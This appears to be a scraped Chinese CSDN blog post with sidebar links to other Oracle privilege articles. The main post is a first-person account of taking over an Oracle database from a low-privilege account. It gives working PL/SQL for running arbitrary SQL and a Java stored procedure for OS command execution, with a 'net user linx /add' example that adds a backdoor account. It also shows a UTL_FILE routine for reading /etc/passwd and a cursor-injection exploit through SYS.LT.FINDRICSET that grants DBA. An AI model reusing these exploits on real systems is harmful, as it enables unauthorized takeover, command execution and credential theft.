oracle的获取权限,连接Oracle服务器后怎么获取权限

最新推荐文章于 2024-05-28 14:34:14 发布
最新推荐文章于 2024-05-28 14:34:14 发布
阅读量195 收藏
点赞数
文章标签: oracle的获取权限
博客内容描述了在无法获得DBA权限的Oracle服务器上,通过创建函数和利用UTL库尝试权限提升的过程,包括试图创建Java扩展执行命令和使用游标注射技术。最终成功获取权限并能读取文件,强调了Oracle服务器安全防护的重要性。
摘要由CSDN通过智能技术生成

连接上oracle服务器,此时发现:      1.连接后不是dba权限     2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限     3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。     幸运的是,     运行     create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;     成功!这个用户具有create proceduce权限。     此时马上想到创建java扩展执行命令:     create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+" ";myReader.close();return str;} catch (Exception e){return e.toString();}}}     begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<>', 'execute' );end;     create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String'     select * from all_objects where object_name like '%LINX%'     grant all on LinxRunCMD to public     select LinxRunCMD('cmd /c net user linx /add') from dual     但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!     还好,我们还有UTL库可以利用:     create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is     fHandler UTL_FILE.FILE_TYPE;     buf varchar2(4000);     output varchar2(8000);     BEGIN     fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');     loop     begin     utl_file.get_line(fHandler,buf);     DBMS_OUTPUT.PUT_LINE('Cursor: 'buf);     exception     when no_data_found then exit;     end;     output := outputbufchr(10);     end loop;     UTL_FILE.FCLOSE(fHandler);     return output;     END;     UTL_FILE_DIR需要先用:     CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';     指定目。但运行后发现没有权限。只好想办法提权 防黑网。     ***************游标注射***************     老外写了N个pdf介绍这技术,我精简了代码:     DECLARE     MYC NUMBER;     BEGIN     MYC := DBMS_SQL.OPEN_CURSOR;     DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);     DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);     BEGIN SYS.LT.FINDRICSET('.''dbms_sql.execute( 'MYC' )'''')--','x'); END;     raise NO_DATA_FOUND;     EXCEPTION     WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);     WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);     END;     运行后重新连接就有dba权限了,简单吧......     现在可以读取文件了:     CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';     select LinxUTLReadfile('passwd') from dual     后面就简单了,不写了。

克嘉
关注
oracle连接另外一个oracle,Oracle 连接 另一个Oracle数据库 服务器连接
weixin_35705475的博客
04-13 3483
一、场景两台不同的服务器A、B分别装有不同业务的oracle数据库,因业务需要,现需要将B中test表的数据,定时同步到A中。二、实现根据以上场景,我想到了oracle中的dblink,当用户需要跨本地数据库,访问另外一个数据库表中的数据时,本地数据库可以通过创建远程数据库的dblink,实现像访问本地数据库一样访问远程数据库表中的数据。三、具体操作1、用sysdba身份登录A服务器oracle,...
kettle连接oracle所需jar包
11-16
- 输入Oracle服务器的“主机名”,“端口”,“服务名”或“SID”(根据你的Oracle实例配置),“用户名”和“密码”。 - 在“额外的JDBC参数”字段中,可以添加特定的JDBC URL,例如:`jdbc:oracle:thin:@...
连接Oracle服务器后怎么获取权限
收集盒 Book box
07-08 554
连接oracle服务器www.zzfhw.com,此时发现:     1.连接后不是dba权限    2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限    3.运行SELECT UTL_HTTP.req
Oracle权限
wanlijunmei的博客
06-16 585
oracle权限分类    系统权限: 比如连接数据库,创建权限过程,创建表等 Oracle规定好能够做的操作    对象权限:  针对某一个对象的权限,对系统权限更细化,细化到某一个对象。 比如对 ,某个表的添加查询,删除,更新等。   ² 授权命令   l  语法格式 Grant 命令1,命令2  to 用户   l  授予登陆数据库的权限
Oracle连接和用户、权限-12c
weixin_34273046的博客
03-15 352
ORACLE 12C使用 orcl数据库服务器连接字符串 启动和关闭[12c 有误] C:\Users\***>sqlplus /nolog SQL*Plus: Release 12.1.0.1.0 Production on 星期日 3月 15 12:56:57 2015 Copyright (c) 1982, 2013, Oracle. ...
oracle获取当前用户权限,oracle 获得当前用户的权限
weixin_29007243的博客
04-12 371
select 'GRANT '||sp||' to '||user from(select s.privilege sp from USER_SYS_PRIVS s unionselect r.granted_role from USER_ROLE_PRIVS r)我的权限如下:1GRANT ALTER ANY INDEX to LANDUSER2GRANT ALTER ANY TABLE t...
Oracle过程中如何获得系统权限以外角色所属的权限!
无情的你,无情的雨!
11-02 717
我们经常有时会遇到这样一个问题,就是在Oracle中建立一个用户,当给这个用户赋予权限时,有角色权限和系统权限,当有些时候方案中的过程需执行一段DDL操作时,可能会提示当前用户的权限不够,而在plsql中单独执行却是可以的,这是因为当前用户执行时可以通过它的角色来获得角色上所拥有的系统权限,而在过程中只能直接获得系统权限,这种问题是出现在Oracle9i以后中的,Oracle也提供了此问题的解决方
oracle远程连接服务器数据库图文教程
09-09
- 安装Oracle客户端软件,如Instant Client或完整版的Oracle Database Client,这将提供必要的库和工具,使本地计算机能够与远程Oracle服务器通信。 - 配置客户端的`tnsnames.ora`文件,这是Oracle网络配置文件,...
sqlserver做链接服务器连接Oracle完整版教程
08-23
这条语句会从Oracle服务器上的`ooef_t`表中获取所有记录。 通过以上步骤,你已经成功地在SQL Server中建立了到Oracle数据库的链接服务器,实现了两个不同数据库系统之间的数据交互。这种配置对于需要在不同数据库...
oracle数据库01-连接&用户&权限
学习笔记
12-07 4617
Oracle数据库是Oracle(中文名称叫甲骨文)公司的核心产品,Oracle数据库是一个适合于大中型企业的数据库管理系统。      Oracle数据库涉及银行、电信、移动通信、航空、保险、金融、电子商务和跨国公司等,Oracle的市场占有率最高,显然Oracle的主要用户涉及面非常广。      Oracle产品是免费的,可以在Oracle官方网站上下载到安装包,但是Oracle服务是收
oracle刚创建的用户获取权限
塑料笔专栏
05-18 1062
当一个用户刚被创建时是不具备任何权限的,因此要在该用户模式下创建表,需授予CREATE SESSION、CREATE TABLE、以及UNLIMITED TABLESPACE(或分配配额)权限,因为: 当用户要连接到数据库时必须拥有CREATE SESSION权限 当用户要创建表时必须拥有CREATE TABLE权限,同时用户还需要在表空间中拥有配额或者被授予UNLIMITED TABLESPAC
oracle 授权连接权限,Oracle 各种权限 显示授权
weixin_29055137的博客
04-03 658
alter any cluster 修改任意簇的权限alter any index 修改任意索引的权限alter any role 修改任意角色的权限alter any sequence 修改任意序列的权限alter any snapshot 修改任意快照的权限alter any table 修改任意表的权限alter any trigger 修改任意触发器的权限alter cluster 修改拥...
oracle权限查询
王者之笨的博客
12-13 2108
–查看所有用户权限 SELECT * FROM dba_users; SELECT * FROM all_users; SELECT * FROM user_users; –查看用户系统权限 SELECT * FROM dba_sys_privs; SELECT * FROM user_sys_privs; –查看用户对象权限 SELECT * FROM dba_tab_privs;
oracle获取访问权限,使用 Kerberos 获取服务访问权限
weixin_29224309的博客
04-09 168
使用 Kerberos 获取服务访问权限要访问特定服务器上的特定服务,用户必须获取两个凭证。第一个凭证是票证授予票证(即所知的 TGT)。票证授予服务解密此凭证后,该服务即可为用户请求访问的服务器创建第二个凭证。然后,可使用第二个凭证来请求访问该服务器中的相应服务。该服务器成功解密第二个凭证后,便会授予用户访问权限。以下各节详细介绍了此过程。获取用于票证授予服务的凭证要启动验证过程,客户机需要向验...
Oracle用户、用户登录连接方式、权限、角色
最新发布
zjxiuqiao的博客
05-28 1289
resource 提供给用户另外的权限以创建他们自己的表、序列、过程(procedure)、触发器(trigger)、索引(index)等。即数据库管理员,功能包括:打开数据库服务器、关闭数据库服务器、备份数据库、恢复数据库、日志归档、会话限制、管理功能、创建数据库。即数据库操作员,功能包括:打开数据库服务器、关闭数据库服务器、备份数据库、恢复数据库、日志归档、会话限制。,客户端和服务器连接,称为会话),主要应用于临时用户,不需要建表的用户。sysdba拥有最高的系统权限,登陆后是 sys。
oracle 创建用户、授予连接、创建表的权限
走码观花
08-23 1333
oracle 创建用户、授予连接、创建表的权限
Oracle权限管理
m0_72327175的博客
04-19 3434
Oracle权限允许用户访问属于其它用户的对象或执行程序,Oracle系统提供三种权限:Object 对象级、System 系统级、Role 角色级。这些权限可以授予给用户、特殊用户public或角色,如果授予一个权限给特殊用户"Public"(用户public是oracle预定义的,每个用户享有这个用户享有的权限),那么就意味作将该权限授予了该数据库的所有用户。(1)系统权限:是指在系统级控制数据库的存取和使用的机制,即执行某种SQL语句的能力。
Oracle权限账户利用SMBrelay获取OS权限
在信息安全领域,攻击者经常寻找系统中的漏洞以获取更高的权限。这篇描述的场景涉及到Oracle数据库系统的一个潜在安全风险,即低权限的数据库账户如何利用特定条件提升到操作系统级别的访问权限。具体来说,如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值